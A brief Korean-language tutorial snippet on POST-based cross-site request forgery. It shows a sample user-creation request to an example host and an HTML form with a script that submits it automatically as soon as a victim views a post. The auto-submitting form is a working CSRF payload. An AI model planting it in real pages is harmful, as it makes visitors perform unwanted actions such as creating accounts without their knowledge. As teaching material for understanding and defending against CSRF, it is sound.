POST 전송 CSRF
<form> 태그로 작성 후, <script> 태그로 게시글등을 확인하자마자 강제 실행되도록 만든다.
# 유저를 생성할 때 패킷이 다음과 같은 POST 전송 형태의 패킷일 경우
POST /NewUser HTTP/1.1
Host: csrfexample.com
Cookie: SESSION=e29a31e41c9512a4bd
Content-Type: application/x-www-form-urlencoded
user_no=""&user_id="test"&user_pwd="password1!"&user_name="test"
Plain Text
복사
<form id="csrf" action="http://csrfexample.com/NewUser" method="post">
<input type="text" name="user_no" value=""/>
<input type="text" name="user_id" value="test"/>
<input type="text" name="user_pwd" value="password1!"/>
<input type="text" name="user_name" value="test"/>
</form>
<script>
document.getElementById('csrf').submit();
</script>
HTML
복사